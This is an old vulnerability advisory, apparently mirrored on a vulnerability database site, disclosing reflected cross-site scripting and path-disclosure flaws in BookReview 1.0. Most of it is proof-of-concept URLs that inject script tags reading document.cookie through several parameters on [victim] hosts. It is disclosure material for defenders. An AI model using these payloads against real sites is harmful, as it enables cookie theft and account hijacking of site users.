Vulners
Lucene search
bookreviewXSS.txt
`###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisore:http://lostmon.blogspot.com/2005/05/
bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
###################################################
BookReview contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate multiple variables upon
submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
############
versions:
############
BookReview beta 1.0 vulnerable.
##############
solution
##############
no solutions was available at this time
###########
timeline
###########
discovered: 27 april 2005
vendor notify 17 may 2005 (webform)
disclosure: 26 may 2005
##################
proof of concepts
###################
all files are submitted to 'index.php' script by variable 'page' like
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of module can be 'add_review' 'add_contents' or others
for example this url:
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25
is the same of this :
http://[victim]/add_contents&isbn=083081423X&chapters=25
with this if you think we have two ways for exploiting this situation
, one with the index.php and other directly by the module.
##################
add_review.htm
#################
http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true
http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true
http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true
http://[victim]/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>
###################
index.php
###################
http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
NICE ERROR !!
; function tallyup() { var count = 0; var book = 0; var part = 0; var
section = 0; var chapter = 0; var appendix = 0; var main_prefix = "";
var section_prefix = ""; for ( i=0; i var persian = '' + value; var
roman=""; var ronumdashes=""; var buffer=10-persian.length; while
(buffer>0) {persian="0"+persian;buffer--} var units=new
Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new
Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var
hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM");
var thousands=new
Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var
billionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes=billionsdashes[persian.substring(0,1)]; var
hundredmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var
tenmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=tenmillionsdashes[persian.substring(2,3)]; var
millionsdashes=new
Array("","_","__","___","_=","=","=_","=__","=___","_=");
romandashes+=millionsdashes[persian.substring(3,4)]; var
hundredthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var
tenthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=tenthousandsdashes[persian.substring(5,6)]; var
thousandsdashes=new Array("","","",""," _","_","_","_","_"," _");
romandashes+=thousandsdashes[persian.substring(6,7)];
roman=thousands[persian.substring(0,1)];
roman+=hundreds[persian.substring(1,2)];
roman+=tens[persian.substring(2,3)];
roman+=thousands[persian.substring(3,4)];
roman+=hundreds[persian.substring(4,5)];
roman+=tens[persian.substring(5,6)];
roman+=thousands[persian.substring(6,7)];
roman+=hundreds[persian.substring(7,8)];
roman+=tens[persian.substring(8,9)];
roman+=units[persian.substring(9,10)]; return roman; } function
alphabetise(number) { return String.fromCharCode(64+number); } ///
function submitconfirm() { var agree =
document.getElementById('agree'); if ( !agree.checked ) { alert("You
must indicate your agreement to the terms and conditions by checking
the box provided."); return false; } return true; }
###################
add_contents.htm
###################
http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
#########################
others.
#########################
http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author
http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels
http://[victim]/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>
############################
posible local fle inclusion
############################
http://[victim]/suggestions/"><script>alert(document.cookie)</script>.htm
http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm
http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author
################
path disclosure:
################
http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=auth
or
http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title
######################## nd ########################
thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4